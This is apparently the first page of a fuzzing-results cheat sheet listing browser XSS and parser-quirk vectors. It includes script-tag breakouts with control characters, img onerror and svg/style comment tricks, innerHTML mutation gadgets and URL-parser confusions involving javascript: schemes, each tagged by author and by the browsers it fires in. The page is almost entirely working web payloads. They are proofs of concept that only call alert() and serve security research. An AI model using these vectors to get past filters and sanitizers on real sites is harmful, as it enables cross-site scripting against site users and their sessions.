Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 153 vectors with results
/^\s+$/.test(String.fromCodePoint(9)) && alert(9)Author: hackvertor
JSRegular ExpressionsChromeSafariFirefox
/^\s+$/.test(String.fromCodePoint(10)) && alert(10)Author: hackvertor
JSRegular ExpressionsChromeSafariFirefox
/^\s+$/.test(String.fromCodePoint(11)) && alert(11)Author: hackvertor
JSRegular ExpressionsChromeSafariFirefox
/^\s+$/.test(String.fromCodePoint(12)) && alert(12)Author: hackvertor
JSRegular ExpressionsChromeSafariFirefox
/^\s+$/.test(String.fromCodePoint(13)) && alert(13)Author: hackvertor
JSRegular ExpressionsChromeSafariFirefox
/\p{scx=Latin}+/gu.test(String.fromCodePoint(i)) && alert(i)JSRegular ExpressionsChromeFirefoxMicrosoft Edge
/\w/ui.test(String.fromCodePoint(i)) && alert(i)Source: Characters matching RegEx /\w/ui
Author: JorianWoltjer
JSRegular ExpressionsChromeFirefoxSafari
let chr = String.fromCodePoint(0);0x0D
let a = document.createElement("a");0x0D
a.href = '/'+chr+'/example.com';0x0D
new URL(a.href).host === "example.com" && alert(0)Author: bribes
JSURL HandlingChrome
const url = new URL(`/${String.fromCodePoint(0)}javascript:alert(origin)`);0x0D
if (url.protocol === 'javascript:') {0x0D
alert(0);0x0D
}Author: siunam321
JSURL HandlingChrome
<script>0x0D
a="</script
><img src=data: onerror=alert(10)>"0x0D
</script>Author: AyushXtha
XSSHTML ParsingChromeFirefoxSafari
<script>0x0D
a="</script0x0C><img src=data: onerror=alert(12)>"0x0D
</script>Author: AyushXtha
XSSHTML ParsingChromeFirefoxSafari
<script>0x0D
a="</script0x0D><img src=data: onerror=alert(13)>"0x0D
</script>Author: AyushXtha
XSSHTML ParsingChromeFirefoxSafari
<script>0x0D
a="</script ><img src=data: onerror=alert(32)>"0x0D
</script>Author: AyushXtha
XSSHTML ParsingChromeFirefoxSafari
<script>0x0D
a="</script>><img src=data: onerror=alert(62)>"0x0D
</script>Author: AyushXtha
XSSHTML ParsingChromeFirefoxSafari
<a id="user_id" href="https:#blah/../../"></a>XSSURL HandlingChromeSafariFirefox
<a id="user_id" href="https:%blah/../../"></a>XSSURL HandlingChromeSafariFirefox
<a id="user_id" href="https::blah/../../"></a>XSSURL HandlingChromeSafariFirefox
<a id="user_id" href="https:<blah/../../"></a>XSSURL HandlingChromeSafariFirefox
<<img src onerror=alert(60)>Source: chars before img tags
Author: t0xodile
XSSHTML ParsingChromeFirefox
<img src onerror=alert(9)0x09style=display:block;content-visibility:auto>Author: t0xodile
XSSHTML ParsingChrome
<img src onerror=alert(10)
style=display:block;content-visibility:auto>Author: t0xodile
XSSHTML ParsingChrome
<img src onerror=alert(12)0x0Cstyle=display:block;content-visibility:auto>Author: t0xodile
XSSHTML ParsingChrome
<img src onerror=alert(13)0x0Dstyle=display:block;content-visibility:auto>Author: t0xodile
XSSHTML ParsingChrome
<img src onerror=alert(32) style=display:block;content-visibility:auto>Author: t0xodile
XSSHTML ParsingChrome
<svg //><style><!--</style><img src onerror=alert(47)>Author: hackvertor
XSSCSS ParsingChromeFirefoxSafari
<svg />><style><!--</style><img src onerror=alert(62)>Author: hackvertor
XSSCSS ParsingChromeFirefoxSafari
<div id="x9"><span x="href=0x09>&bbb"></span></div>0x0D
<script>0x0D
window["x9"].innerHTML=window["x9"].innerHTML;0x0D
if (window["x9"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(9)0x0D
}0x0D
</script>Author: InsertScript
XSSURL HandlingChromeMicrosoft Edge
<div id="x10"><span x="href=
>&bbb"></span></div>0x0D
<script>0x0D
window["x10"].innerHTML=window["x10"].innerHTML;0x0D
if (window["x10"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(10)0x0D
}0x0D
</script>Author: InsertScript
XSSURL HandlingChromeMicrosoft Edge
<div id="x12"><span x="href=0x0C>&bbb"></span></div>0x0D
<script>0x0D
window["x12"].innerHTML=window["x12"].innerHTML;0x0D
if (window["x12"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(12)0x0D
}0x0D
</script>Author: InsertScript
XSSURL HandlingChromeMicrosoft Edge
<div id="x13"><span x="href=0x0D>&bbb"></span></div>0x0D
<script>0x0D
window["x13"].innerHTML=window["x13"].innerHTML;0x0D
if (window["x13"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(13)0x0D
}0x0D
</script>Author: InsertScript
XSSURL HandlingChromeMicrosoft Edge
<div id="x32"><span x="href= >&bbb"></span></div>0x0D
<script>0x0D
window["x32"].innerHTML=window["x32"].innerHTML;0x0D
if (window["x32"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(32)0x0D
}0x0D
</script>Author: InsertScript
XSSURL HandlingChromeMicrosoft Edge
<svg /><style><!--</style><img src onerror=alert(47)>Author: hackvertor
XSSCSS ParsingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript0x09://xss.com").host=="xss.com"){alert(9)}Author: RenwaX23
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript+://xss.com").host=="xss.com"){alert(43)}Author: RenwaX23
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript-://xss.com").host=="xss.com"){alert(45)}Author: RenwaX23
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript.://xss.com").host=="xss.com"){alert(46)}Author: RenwaX23
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript0://xss.com").host=="xss.com"){alert(48)}Author: RenwaX23
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
โฆ09โงx=123โฆ09โง0x0D
alert(9)JSXSS ExecutionChromeFirefoxSafari
x=123
0x0D
alert(10)JSXSS ExecutionChromeFirefoxSafari
0x0Bx=1230x0B0x0D
alert(11)JSXSS ExecutionChromeFirefoxSafari
0x0Cx=1230x0C0x0D
alert(12)JSXSS ExecutionChromeFirefoxSafari
0x0Dx=1230x0D0x0D
alert(13)JSXSS ExecutionChromeFirefoxSafari
const s = String.fromCodePoint(i);0x0D
if (!encodeURI(s).includes("%")) alert(i);0x0D
Source: encodeURI() not encoded with %
Author: forglockenspielexact
JSJavaScript SyntaxChrome
Page 1 of 8